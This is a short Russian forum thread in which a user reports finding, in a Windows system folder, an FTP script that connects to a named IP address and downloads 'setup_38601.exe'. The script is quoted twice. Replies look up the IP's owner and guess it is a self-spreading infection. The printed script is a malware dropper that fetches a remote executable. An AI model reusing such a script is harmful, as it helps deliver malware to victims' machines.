Такой наглости я не ожидал

Все, что вы хотели знать о программизме, но боялись спросить.
Ответить
Аватара пользователя
eprst
Маньяк
Сообщения: 4722
Зарегистрирован: 01 июл 2004, 17:53
Откуда: Пи Тер -> Ню Вест

Такой наглости я не ожидал

Сообщение eprst »

Заглянул случайно в C:\WINNT\SYSTEM32 и нашел там файл такого содержания :

open 70.71.98.150 17725
user 1 1
get setup_38601.exe
quit

(AdAware и AVG не нашли)

Такой наглости я не ожидал чтобы IP address так смело указывать.
Это что начинающие хакеры? Адрес - статический (вроде SHAW)?
Аватара пользователя
CdR
Графоман
Сообщения: 11245
Зарегистрирован: 11 окт 2004, 19:27
Откуда: Европа, центр, за углом направо.

Re: Такой наглости я не ожидал

Сообщение CdR »

прелесть.

whois:
OrgAbuseHandle: SHAWA-ARIN
OrgAbuseName: SHAW ABUSE
OrgAbusePhone: +1-403-750-7420
OrgAbuseEmail: internet.abuse@sjrb.ca

$ host 70.71.98.150
]150.98.71.70.in-addr.arpa domain name pointer S010600105a5badb1.vs.shawcable.net.
Аватара пользователя
Stanislav
Mr. Minority Report
Сообщения: 45208
Зарегистрирован: 19 окт 2005, 16:33
Откуда: Moscow - Richmond - New Wesт - Burnaby - PoCo

Re: Такой наглости я не ожидал

Сообщение Stanislav »

eprst писал(а):Заглянул случайно в C:\WINNT\SYSTEM32 и нашел там файл такого содержания :

open 70.71.98.150 17725
user 1 1
get setup_38601.exe
quit

(AdAware и AVG не нашли)

Такой наглости я не ожидал чтобы IP address так смело указывать.
Это что начинающие хакеры? Адрес - статический (вроде SHAW)?
А чем они рискуют? Докажите, что это они его туда прописали! Они скажут - это нас хакеры-хрюкеры подставляют! :lol:
Аватара пользователя
sz
Маньяк
Сообщения: 1266
Зарегистрирован: 17 фев 2003, 19:34

Сообщение sz »

> это нас хакеры-хрюкеры подставляют!

Что характерно, скорее всего, так и есть.
Думаю, setup_38601.exe умеет узнать ip и распостранить себя с него :)
Ответить